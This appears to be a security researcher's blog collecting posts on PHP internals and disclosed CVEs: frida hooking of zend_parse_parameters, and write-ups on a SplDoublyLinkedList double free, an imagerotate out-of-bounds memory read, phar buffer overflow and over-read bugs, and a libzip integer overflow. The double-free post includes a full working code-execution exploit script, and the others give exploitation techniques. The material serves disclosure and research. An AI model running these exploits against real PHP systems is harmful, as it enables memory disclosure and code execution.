Blog

Hunting for hidden parameters within PHP built-in functions (using frida)

posted Feb 2, 2018, 12:13 AM by Emmanuel Law   [ updated Feb 2, 2018, 12:28 AM]

When I was working on PHP, I had found some "hidden" parameters to PHP built-in functions but had been too busy lazy to document the methodology down. Hopefully this might be of interest to others out there, even though this is pretty simple. It'll also be a good showcase of frida and how easy/powerful it is.

P/S: If you are looking for vulnerabilities, you can stop reading this post now. There is none.

Let's just dive straight into what I mean by "Hidden parameters". The image below shows the API for the built-in function intlcal_from_date_time : 




One can typically call it as follows:

intlcal_from_date_time("1pm")

Notice that the documented API only allows for 1 input. 

Or does it? 

There's actually a 2nd undocumented parameter, that you can pass in to set it's locale. For example you can call it via:

intlcal_from_date_time("1pm", "zh-Hant-TW")

This returns an intlcalender object with its locale set to Chinese, Taiwan.

The question one might ask is, why is there an undocumented parameter? I've no idea. Could it just have been the lack of documentation updates? Maybe. Does it do anything really fanciful ? Not in this case. It just sets the locale. 

However these hidden parameters or discrepancy in the documentation do present an additional attack surface area which is of interest to me for fuzzing.


So the question now is: How does one go about discovering these hidden parameters systematically.

To do that, one must understand how PHP API parses parameters internally within the zend engine. When a call is made to a PHP function, the parameters are being parsed and validated internally by Zend engine's zend_parse_parameters.

In the case of intlcal_from_date_time(), lets' look at the source code within intl/calendar/calendar_methods.cpp:

12345678
U_CFUNC PHP_FUNCTION(intlcal_from_date_time){....	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "Z|s!",			&zv_arg, &locale_str, &locale_str_len) == FAILURE) {

On line 7, You will see that zend_parse_parameters is being called to parse and validate the inputs to intlcal_from_date_time(). It is being validated against the pattern "Z|s!". Here's how to interpreter the pattern:

Z: it is expecting a required zend object ($dateTime in this case)
| : anything after this is optional
s: It takes in an optional string (Which is our hidden parameter Locale in this case)
More information about the patterns can be found here 


So my methodology to discovering these hidden parameters systematically is as follows:
  1. Startup PHP cli binary
  2. Invoke a PHP built-in function
  3. Using frida hook into zend_parse_parameters (and its related sister functions)
  4. Obtain the parameter patterns that is being validated againsts
  5. Compare it against the official documentation.
  6. Rinse repeat for every built-in function within PHP
Before anyone gets too excited, there are only a handful of functions with hidden parameters, not all of them do anything interesting. I'll leave that as an exercise for the reader.

However, this methodology of hooking into zend_parse_parameters does allow me to identify and build a database of exactly what Zend-engine is looking for when calling a PHP built in function. I've found this to be especially useful when I was fuzzing PHP, as the documentation often label a perimeter as "mixed" which can be quite ambiguous.

Let me end off with a simple snipplet of my python + frida code to hook into zend_parse_parameters.


 1 2 3 4 5 6 7 8 91011121314151617181920212223
pid = frida.spawn([PHP_BIN, "-r", self.cmdstr])session = frida.attach(pid)script = session.create_script("""    Interceptor.attach(ptr(Module.findExportByName(null, "zend_parse_parameters")), {        onEnter: function(args) {          Memory.readCString(args[1]));          send(Memory.readCString(args[1]));    }    });""")script.on('message', self.on_message)script.load()frida.resume(pid)def on_message(self,message, data):  #Parameter Pattern will be stored within message[payload]  #Validate that against the official PHP documentation



Double Free in Standard PHP Library Double Link List [CVE-2016-3132]

posted Apr 13, 2016, 5:45 PM by Emmanuel Law   [ updated Feb 1, 2018, 9:01 PM]

I found a double free vulnerability in the Standard PHP Library (SPL). While writing the exploit, I can't seem to find much write up on how PHP manages their heap internally. Through this blogpost I'll shed some light on this topic as well as my approach to exploit a double-free vulnerability like this within PHP.

Root Cause Analysis

The vulnerability is in SplDoublyLinkedList::offsetSet ( mixed $index , mixed $newval ) when passing in an invalid index. For example:

<?php$var_1=new SplStack();$var_1->offsetSet(100,new DateTime('2000-01-01')); //DateTime will be double-freed

When an invalid index (100 in this case) is passed into the function, the DateTime object is being freed for the first time in line 833:

 832                 if (index < 0 || index >= intern->llist->count) { 833                         zval_ptr_dtor(value); 834                         zend_throw_exception(spl_ce_OutOfRangeException, "Offset invalid or out of range", 0); 835                         return; 836                 }
The second free occurs in Zend/zend_vm_execute.h:855 when it cleans up the call stack:
  854                 EG(current_execute_data) = call->prev_execute_data;  855                 zend_vm_stack_free_args(call);


PHP Internal Heap Management

Internally within PHP, when doing heap allocations via calls such as ealloc(), it falls into 3 categories depending of the size:
Small heap allocation (< 3072 bytes)
Large heap adllocation ( < 2 megabytes)
Huge heap allocation ( > 2 megabytes)

Lets explore the small heap allocation/deallocation since that's what we are going to be using in this exploit. When dealing with memory handled by the small heap allocator, each chunk of memory is categorised into "bins" based of their size. For example:

  • Bin #1 : contains chunk sizes from 1 - 8 bytes
  • Bin #2:  contains chunk sizes from 9 - 16 bytes
  • Bin #3:  contains chunk sizes from 17 - 24 bytes
  • Bin #YouGetTheIdea....
When a memory chunk is freed internally within PHP via calls such as efree(), if the chunk in question is handled by the small heap deallocator, instead of releasing it back to the OS, it caches it and place it into an appropriate "Bin". This Bin is implemented as a single link list with freed chunks of memory being chained together.
The first couple bytes of each freed chunk can be considered its header and it contains a pointer that points to the next freed chunk. Visually this is what it looks like in the memory:

Exploitation

Step 0: Evaluate if this is feasibly exploitable. This vulnerability is triggered by trying to insert an object into an invalid SplDoublyLinkedList index. This triggers a fatal error as such:

Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range

Upon the fatal error, PHP exits immediately. This prevents us from running any user code in "userland" after the double free. Thus in order for us to exploit this vulnerability, we need to trap the error and make PHP not exit immediately after the double free. This can be done via the set_exception_handler();

Step 1: We need to decide on what object we want to trigger the double free on. I have chosen to use SplFixedArray for this due to the following reasons:
  • The size of SplFixedArray is small enough such that it is being managed by the small heap allocation
  • The size of SplFixedArray is of a size that is not commonly used by PHP internals and thus there's less interference. In this case the size of SplFixedArray is 0x78 and fits into the Bin #12.
  • SplFixedArray is represented as in struct internally and there's a member at a particular offset that is useful for exploitation. I'll talk more about this in step 3. 
Step 2: We need to do some heap massaging. First let's do some cleaning up and clear any free chunks of memory in the Bin associated with SplFixedArray's size. We can do that by allocating many instances of the object. This also ensures that the SplFixedArrays allocated are in contiguous chunk of memory

123456
for ($x=0;$x<100;$x++){$z[$x]=new SplFixedArray(5);}unset($z[50]);

On line 5 above, we free the 50th SplFixedArray. This creates a hole in the contiguous chunk of memory allocated and can be visualized as:


We immediately allocate a new SplFixedArray (which causes it to occupy the 50th slot) and trigger the double free vulnerability on it:

123
<?php$var_1=new SplStack();$var_1->offsetSet(100,new SplFixedArray);

The reasons for all these heap manipulation is to ensure that the double free vulnerability is triggered on a location that is part of my controlled contiguous chunk of memory. This gives me relative good control of the memory layout as well as references to its neighboring chunk of memory (49th and 51st SplFixedArray).

After the first free, this is what the memory looks like:


After the 2nd free, this is what the memory looks like:





Step 3: Let's now exploit this abnormally in the heap. Notice that there's only 1 free chunk of memory? However the link list now has two arrows which points to the same chunk of memory. At this point, the heap is corrupted and PHP think there's 2 free chunk of memory when there's only 1.

This means that we can allocate 2 free chunk ( from Bin #12) and they will occupy the same memory space:

123456789
<?php$s=str_repeat('C',0x48);$t=new mySpecialSplFixedArray(5);class mySpecialSplFixedArray extends SplFixedArray{   public function offsetUnset($offset) {         parent::offsetUnset($offset);    }}

In the code above we allocate a string (line 2) and an object mySpecialSplFixedArray (line 3) which will both occupy and the same space between the 49th SplFixedArray and 51st SplFixedArray.


Notice that in line 3 I allocated mySpecialSplFixedArray which is just an extended class of SplFixedArray but with the offsetUnset method being overwritten. To understand why, lets take a look at the PHP internal structure of a String vs  SplFixedArray:


  • When we first allocate the string via $s=str_repeat('C',0x48), zend_string.len will have the value of 0x48
  • Next,If we were to allocate a new SplFixArray(),  by default fptr_offset_set has the value of 0. Since this occupy the same memory space as the string previously allocated, it will set zend_string.len = 0
  • However by extending the SplFixeArray class and overwrite offsetUnset(), fptr_offset_set will be contain the address of the userdefined function somewhere in memory. This address is definitely going to be larger than 0x48.  Since fptr_offset_set will overwrite zend_string.len (since they share the same memory space), PHP now thinks that we have a much larger string than we originally allocated (In reality it was only ever allocated the space between the 49th and 51st SplFixArray).

Step 4: Gaining Code execution. At this point:
  • PHP now thinks that $s is a very large string, and thus we can now read/write into and beyond the 51st SplFixArray.
  • $t is our  mySpecialSplFixedArray object which shares the same address space of $s.
Assuming I want to execute code at 0xdeadbeef, here's the approach I'll take:
  1. Create a fake Handler structure with destructor that points to 0xdeadbeef
  2. Ovewrite mySpecialSplFixedArray handler to point to our fake handler structure
  3. unset(mySpecialSplFixedArray)  which could call the destructor on our object. Since the object now points to our fake handler structure, code will be executed at where our destructor is pointing to.

Achieving (1) is easy because we can write into the 51st SplFixArray and sore our fake Handler structure there.Achieving (2) is also easy because $s and mySpecialSplFixedArray shares the same memory space.
The tricky part here is that when we create the fake Handler structure, we do not know the address of where is the exact address fake structure. Without knowing the address, we can't point mySpecialSplFixedArray to our fake handler structure.

The solution to that would be to free the 51st and 52nd SplFixArray:
Due to this free, the first 8 bytes of the 51st SPLFixedArray chunk now points to the 52nd SPLFixedArray memory chunk. By using $s to read into the first 8 bytes of the 51st SplFixedArray, one can figure out the exact memory address that one is in.


Here's the exploit code in its full glory:


 1 2 3 4 5 6 7 8 9101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566
<?php// #######   HELPER Function ##############function read_ptr(&$mystring,$index=0,$little_endian=1){return hexdec(dechex(ord($mystring[$index+7])) .dechex(ord($mystring[$index+6])) . dechex(ord($mystring[$index+5])).dechex(ord($mystring[$index+4])).dechex(ord($mystring[$index+3])).dechex(ord($mystring[$index+2])). dechex(ord($mystring[$index+1])).dechex(ord($mystring[$index+0])));}function write_ptr(&$mystring,$value,$index=0,$little_endian=1){//$value=dechex($value);$mystring[$index]=chr($value&0xFF);$mystring[$index+1]=chr(($value>>8)&0xFF);$mystring[$index+2]=chr(($value>>16)&0xFF);$mystring[$index+3]=chr(($value>>24)&0xFF);$mystring[$index+4]=chr(($value>>32)&0xFF);$mystring[$index+5]=chr(($value>>40)&0xFF);$mystring[$index+6]=chr(($value>>48)&0xFF);$mystring[$index+7]=chr(($value>>56)&0xFF);}// ####### Exploit Start #######class SplFixedArray2 extends SplFixedArray{public function offsetSet($offset, $value) {}public function Count() {echo "!!!!######!#!#!#COUNT##!#!#!#!#";}public function offsetUnset($offset) {parent::offsetUnset($offset);}}function exception_handler($exception) {global $z;$s=str_repeat('C',0x48);$t=new SplFixedArray2(5);$t[0]='Z';unset($z[22]);unset($z[21]);$heap_addr=read_ptr($s,0x58);print "Leak Heap memory location: 0x" . dechex($heap_addr) . "\n"; $heap_addr_of_fake_handler=$heap_addr-0x70-0x70+0x18+0x300;print "Heap address of fake handler 0x" . dechex($heap_addr_of_fake_handler) . "\n";//Set Handlerswrite_ptr($s,$heap_addr_of_fake_handler,0x40);//Set fake handlerwrite_ptr($s,0x40,0x300); //handler.offsetwrite_ptr($s,0x4141414141414141,0x308); //handler.free_objwrite_ptr($s,0xdeadbeef,0x310); //handler.dtor.objstr_repeat('z',5);unset($t);  //BOOM!}set_exception_handler('exception_handler');$var_1=new SplStack();$z=array();//Heap managementfor ($x=0;$x<100;$x++){$z[$x]=new SplFixedArray(5);}unset($z[20]);$var_1->offsetSet(0,new SplFixedArray);

Original bug report can be found here

Exploiting CVE-2016-1903: Memory Read via gdImageRotateInterpolated

posted Feb 10, 2016, 5:13 PM by Emmanuel Law   [ updated Feb 15, 2016, 6:23 PM]

Vulnerability Background

This isn’t a vulnerability with a large impact, but it’s one that I thoroughly enjoyed exploiting. Hence this blogpost.
The issue is in the PHP function imagerotate() :

 Resource imagerotate ( resource $image , float $angle , int $bgd_color)


The function takes in an $image, rotates it by $angle degrees and fills any empty space left over as a side-effect of the rotation with $bgd_color.

$image can be a palette-based image or a true color image. In the case of a palette-based image, $bgd_color is an index into the image's color palette.

Here’s an example of how the function is used in practice:

 1 2 3 4 5 6 7 8 9101112131415
<?php//Create square image of 100 *100$mypic=imagecreate(100,100);//Allocate 3 colors into the PALLETEimagecolorallocate($mypic,0xFF,0,0); //Red @PALETTE[0]imagecolorallocate($mypic,0,0,0xFF);// Blue @ PALETTE[1]imagecolorallocate($mypic,0,0xFF,0);// Green @ PALETTE[2]// Fill the Square with PALETTE[2] (Green)imagefill($mypic,0,0,2);//Rotate the image by 90 degrees and fill empty space with the color at Pal    ette[1] (BLUE)$mypic2=imagerotate($mypic,45,1);

The code creates an image as follows:



The crux of the vulnerability is in the function’s handling of the $bgd_color parameter to imagerotate(). That is an index to the Color Pallette. Looking at the PHP code, we can see that the palette is stored within the image’s gdImageStruct structure as red, green, blue and alpha arrays:

typedef struct gdImageStruct {	/* Palette-based image pixels */	unsigned char **pixels;	int sx;	int sy;	/* These are valid in palette images only. See also	   'alpha', which appears later in the structure to	   preserve binary backwards compatibility */	int colorsTotal;	int red[gdMaxColors];	int green[gdMaxColors];	int blue[gdMaxColors];	int open[gdMaxColors];......................	int alpha[gdMaxColors];


The size of each array is gdMaxColors, defined elsewhere as 255. The function does not check that the passed in $bgd_color falls between these arrays’ valid ranges of 0 - 255, potentially resulting in an out of bound lookup to the arrays. Thus, if we run the following code, where $bgd_color is a large number (0x6667), we get the following image:


$mypic2=imagerotate($mypic,45,0x6667);




Notice the maroon color in the background? The color came from the undefined memory located at red[0x6667], blue[0x6667], green[0x6667] and alpha[0x6667].

By "deciphering" the background color, we can attempt to determine the bytes that were at that memory location, allowing us to perform an arbitrary memory read!


Exploiting the Vulnerability to Read Memory

Here's a high level visualization of how the image's color palette looks like in memory:

Here's how PHP computes the the background color using the RGBA word-order convention:

gdTrueColorAlpha(r, g, b, a) (((a) << 24) + \			((r) << 16) + \			((g) << 8) +  \			(b))

Thus given a background color, we can obtain the underlying bytes of memory that were at that color’s memory location by:
  • Step 1: Breaking up the color into the individual RBG Alpha components. Each components leaks one of the bytes in the memory location
  • Step 2: Repeat step 1 over the out-of-range palette indices that correspond to the memory we want to read, e.g: imagerotate($mypic,45, 256....)
  • Step 3: Reconstitute the pieces of memory leaked in Step 1 and 2 into contiguous chunks.

Step 1 should be easy right? Looking at the PHP code above, breaking a color back into its RBG Alpha compoments should be as easy  as a couple of bit shifting here and a couple of bit shifting there. Apparently Not! This is where it gets tricky (and fun)! There are a couple of issues:


Issue 1: PHP's RGBA internal representation 
By convention, each RGBA component are typically represented by 1 single byte. For example, this color with 50% opacity is represented as 0x80FF9000 (ARGB convention) where:
  • 0x80 = Alpha (50% opacity)
  • 0xFF = RED
  • 0x90 = Green
  • 0x00 = Blue
If PHP  had used this typical convention of 1 byte per component, reversing a background color back into the underlying memory would be extremely trivial. Instead, PHP stores each RGBA component as 32-bit Integers (4 bytes), despite only requiring 1 byte! Thus, this is a more accurate high level visualization of a PHP image's color palette, shown when computing the background color at index x:

Since PHP uses 4 bytes per color component, the formula to calculate the background color can be  better visualized as:

This implies that given a single background color, it is only possible to obtain the first byte of red[x] from the least significant byte of the background color. The other bytes (MSB to 2nd LSB) from the background color are a "tangle" of other the color components and appear to be impossible to separate. 

The trick is to correlate a whole bunch of background colors. For example, given a background color computed from palette[x], we will know the LSB of Red[X]. This is denoted by ! in cell AX[1st Byte]: 




Now what if we increase the palette index by 256 and compute the background from index x+256? This will give us BX[1st Byte] (This is the LSB of RED[X]). Since we now know BX[1st Byte], we can infer AX[2nd Byte] because background color Palette[X][2ndByte]= AX[2nd Byte] + BX[1st Byte] :




If we continue on another 256 bytes and compute the background from the x+512 index, we can infer even more bytes:

Thus this is how we can solve the issue of PHP using 32-bit integers for RGBA component representation and infer bytes in the original bytes in out-of-range memory. The only other tricky thing to take note of when inferring the bytes is to consider potential carry bits.




Issue 2: PHP converts the palette-based image to a true color image after rotation

The vulnerability is triggered by imagerotate() and the vulnerable path is only taken when the image is a palette-based image. This is how the code is implemented in PHP:


 1 2 3 4 5 6 7 8 910
gdImagePtr gdImageRotateInterpolated(const gdImagePtr src, const float angle, int bgcolor){......	if (src->trueColor == 0) {		if (bgcolor >= 0) {                        //Vulnerable line:			bgcolor =  gdTrueColorAlpha(src->red[bgcolor], src->green[bgcolor], src->blue[bgcolor], src->alpha[bgcolor]);		}		gdImagePaletteToTrueColor(src); //convert to true color	}



Notice the following:
  • Line 4: Checks that the image is palette-base
  • Line 7: The vulnerable code with array index out of bounds
  • Line 9: Converts image from palette based to true color
The Implication of line 9 is that for each image, you can only trigger the vulnerable code once before it is being coverted to a true color. You might ask, why can't we just generate a bunch of different images and trigger the vulnerable code once on each image? This is because, each image gets allocated in different parts of PHP heap, meaning that it would virtually be impossible to read from the same contiguous out-of-range memory using the above technique.

To solve this issue, here is my pseudo code:
  1. Cal CreateImage ()
  2. Trigger Vulnerable on Image to extract some bytes from the background color. After this, the image now is converted into true color and the vulnerablity can't be triggered on that same image anymore.
  3. Call imagedestroy(); This destroy the image and frees the memory back into PHP Zend Memory Manager Cache
  4. Immediately invoke a CreateImage(). This creates a new image. PHP Zend Memory Manager Cache will allocate the image with the same memory from its cache that was freed in step 3. Since this is now a new image, it's created as a palette-based image.
  5. We can now trigger the vulnerability on the image again. 
  6. Rinse and repeat for the entire out-of-range memory that you want to read

Issue 3:Alpha array is at a weird offset
Notice that the arrays for Red, Blue, Green are all contiguous ? Not so for the Alpha array. It is at an offset which makes things a pain. This is something that has to be considered when writing the exploit.


Original bug report can be found here.

Here's my POC to read contiguous chunks of memory. It outputs memory like so:


CVE-2015-3329: POC for buffer overflow in PHP phar_set_inode

posted Apr 18, 2015, 7:04 AM by Emmanuel Law

Background

PHP has the built-in Phar & PharData functionality since 5.3.0. These are used to manipulate the following archive types: tar,zip & phar. I found this vulnerability through fuzzing.


Technical Detail


This is a standard BOF in phar_set_inode() @ phar_internal.h:

static inline void phar_set_inode(phar_entry_info *entry TSRMLS_DC) /* {{{ */{	char tmp[MAXPATHLEN];	int tmp_len;	tmp_len = entry->filename_len + entry->phar->fname_len;	memcpy(tmp, entry->phar->fname, entry->phar->fname_len);	memcpy(tmp + entry->phar->fname_len, entry->filename, entry->filename_len);	entry->inode = (unsigned short)zend_get_hash_value(tmp, tmp_len);}

The vulnerability occurs because it didn't check that tmp_len is < MAXPATHLEN. On my x64bits ubuntu MAXPATHLEN=0x1000. 

Exploiting the vulnerability is trivial since attacker controls entry->filename and entry->filename_len. The only thing to note is that since tmp_len is below tmp[] on the stack, when overwriting tmp_len, it needs to ensure that the value being overwritten with is within reasonable limits, otherwise it would crash when zend_get_hash_value() is called.


There are multiple pathways to trigger this:
  • Parsing Tar
  • Parsing Zip
  • Parsing Phar
I've found that the easiest (read: boring) way to trigger it was via ZIP. The more interesting path would be via Tar for the following reasons:

  • The Tar header has a CRC check which makes it a slight pain during exploit development. However it can be bypassed because of this:
 102 103 115 116 117 118
int phar_is_tar(char *buf, char *fname) /* {{{ */{......	ret = (checksum == phar_tar_checksum(buf, 512));.....	if (!ret && strstr(fname, ".tar")) {		/* probably a corrupted tar - so we will pretend it is one */		return 1;	}}


Even though it validates the checksum (line 116), as long as the file ends with .tar (line 118), it would always pass the validation. Cheers PHP for being so lenient ;)

  • When exploiting a Zip, all you need for exploitation is a single entry with a long fname_len. Not for Tar because of stuff like the following in tar.c where entry.filename_len is limited to 256 (line 411), which is not enough to overflow the return address.
 394 395 396 397 398 399 400 401 402403404405406407408409410411
char name[256];int i, j;for (i = 0; i < 155; i++) {	name[i] = hdr->prefix[i];	if (name[i] == '\0') {		break;	}}name[i++] = '/';for (j = 0; j < 100; j++) {	name[i+j] = hdr->name[j];	if (name[i+j] == '\0') {		break;	}}entry.filename_len = i+j;
  • However by analysing the code path, it is still exploitation through the use of 2 tar entries (aka file header blocks): 
    • First a Longlink entry (EG: typeflag='L') to prep entry.filename_len to a large value. 
    • Followed by a traditional normal file entry
  • The best part of doing it this way is that you don't need to worry about entry check sums as it's done only on the 2nd entry. You can just grab it from any existing tar file and use it verbatim without having to calculate any checksum.
POC for exploits can be downloaded here. Written for:
  • x64 ubuntu
  • ./configure --enable-debug --enable-zip

Bug report can be found here

CVE-2015-2783: Exploiting Buffer Over-read in Php's Phar

posted Apr 15, 2015, 9:24 PM by Emmanuel Law   [ updated Jun 1, 2015, 8:39 PM]

Background

The Phar extension is built into PHP > 5.3.0. It allows developers to use manipulate the following archives: tar, zip, phar.

I found this vulnerability while I was assessing the security of the phar extension. When parsing a phar file, it is possible to trigger a buffer over-read condition and leak memory information. This vulnerability is interesting as it's not a typical exploitation just by controlling the read size. 

Affected version are PHP < 5.6.8RC1

Technical Details
Phar files metadata are stored in php serialized format. When processing a phar file, php attempts to unserialize the medatadata in phar.c:

623
if (!php_var_unserialize(metadata, &p, p + buf_len, &var_hash TSRMLS_CC)) {


  • p points to the start of serialized metadata in the file buffer. 
  • p + buf_len points to the end
  • buf_len is a field specified in the phar file and user controllable

php_var_unserialize() is the same function that is called when unserialize() is invoked in PHP "user-land".

Within Php_var_unserialize () there is a sanity check to ensure that p does not go beyond p + buf_len:

461469470471892893894895896897898899900901902903904905906907908909910911
PHPAPI int php_var_unserialize(UNSERIALIZE_PARAMETER) //zval **rval, const unsigned char **p, const unsigned char *max, php_unserialize_data_t *var_hash TSRMLS_DC{...	if (YYCURSOR >= YYLIMIT) {		return 0;	}.....yy48:	++YYCURSOR;	if ((YYLIMIT - YYCURSOR) < 2) YYFILL(2);	yych = *YYCURSOR;	if (yych <= '/') goto yy18;	if (yych <= '9') goto yy48;	if (yych >= ';') goto yy18;	yych = *++YYCURSOR;	if (yych != '"') goto yy18;	++YYCURSOR;	{	size_t len, maxlen;	char *str;	len = parse_uiv(start + 2); 	maxlen = max - YYCURSOR;   	if (maxlen < len) {p		*p = start + 2;		return 0;	}

  • Line 469 checks that p !> p+buflen
  • Line 894 looks like it's sanity checking as well. But this is just template code left over by re2c when generating var_unserializer.c file. It is typically used by the regex library to fill up the data buffer when it's getting low. However in PHP case, php_var_unserialize will always have the full serialized data in the buffer from the very beginning.  Thus YYFILL is just a while(0) loop that does nothing. It's interesting to note that the compiler actually optimized this line of code out. In essence, this line of code never gets executed.
  • Theres another sanity check at line 908 to ensure the length of the data doesn't go beyond p+buf_len

When we start unserializing a string in the format: s:<len>:"<Data>", lines 890-900 is essentially a loop to extract out <len>. As long as <len> is a digit, it would keep looping even if YYCURSOR goes beyond  p+buf_len.

When YYCURSOR goes beyond max (aka p+ buf_len or YYLIMIT),  it results in an integer underflow on line 907. Thus the sanity check on line 908 will always pass.

There's also some format checks:

900

915
916
917918919920
if (yych != '"'goto  yy18;  
....
YYCURSOR += len;

if (*(YYCURSOR) != '"') {	*p = YYCURSOR;	return 0;}

Lines 900, 915 to 920 checks the data format for the tokens as highlighted :  s:<len>:"<Data>" 



In essence, what this means is that once YYCURSOR goes beyond max when extracting <len>, <len> can be as large a number as you want and it will unserialize to a string successfully as long as it's in the format  s:<len>:"<Data>"

This is the state you want it look like during exploitation:





At this point one might ask, how do we ensure that the ending byte is  " since it's in a memory region beyond our control? Well you have 1 in 255 chance of strike gold. But one possible way to exploit it is just to keep "hammering" the various values of xxxxxxxxxxxx . Sooner or later you will encounter a  ".

One might also ask, why can't I trigger this buffer over read through a typical unserialize call? For example why can't we trigger it via unserialize("s:0010") + some heap massaging? Why is it only vulnerable when we unserialize through phar?
  • Reason is when we do a typical unserialize(), we are passing in a string. In PHP, a string is always null terminated. So essentially you are passing in s:0110\0 . Even if we massage the heap such that :" appears immediately after the string, it still wouldn't unserialize properly as the null byte breaks the unserializing process. 
  • In Phar, the attacker control the data immediately past p+buf_len as it is still part of the phar file.


Here's a screenshot of successful exploitation to leak memory a la Heartbleed style:



After Thoughts

I exploited this by using a serialized string type. It would be interesting to see if we can get code execution using other types.

The full bug report could be found here

CVE-2015-2331: ZIP Integer Overflow Root Cause Analysis

posted Apr 1, 2015, 12:52 AM by Emmanuel Law   [ updated Apr 1, 2015, 3:23 AM]

I was fuzzing PHP zip extension and found the first crash on the 28th day. Sure took me a while.

The vulnerability is an integer overflow when parsing Zip64 on zip_dirent.c:113:

else if ((cd->entry=(struct zip_entry *)malloc(sizeof(*(cd->entry))*(size_t)nentry)) == NULL) {

nentry is obtained from the zip file.  On my x64, sizeof(*(cd->entry)) = 0x20 bytes long. Thus when nentry > 0x7FFFFFFFFFFFFFF, this will results in an integer overflow and malloc will allocate less memory then required.

Further down in zip_dirent.c:119

for (i=0; i<nentry; i++)	_zip_entry_init(cd->entry+i);

_zip_entry_init() will enter a loop to write stuff on the allocated memory. This goes on and on until it overwrites the allocated memory on the heap. 

The most likely reason it took 28 days of fuzzing to find this is because of zip_open.c:113

 
    /* number of cdir-entries on this disk */    i = _zip_read2(&cdp);    /* number of cdir-entries */    nentry = _zip_read2(&cdp);    if (nentry != i) {	_zip_error_set(error, ZIP_ER_NOZIP, 0);

i = total number of entries in the central directory on this disk
nentry = total number of entries in the central directory

Random bit flipping will need to flip the both the i and nentry field to the same overflow values before going down the crash path.


After reporting this bug, I realized that it has a wider implication as this is a bug in libzip.  PHP is naturally affected as it has a embedded (and modified) version of libzip in it's code.

Full bug report can be found here.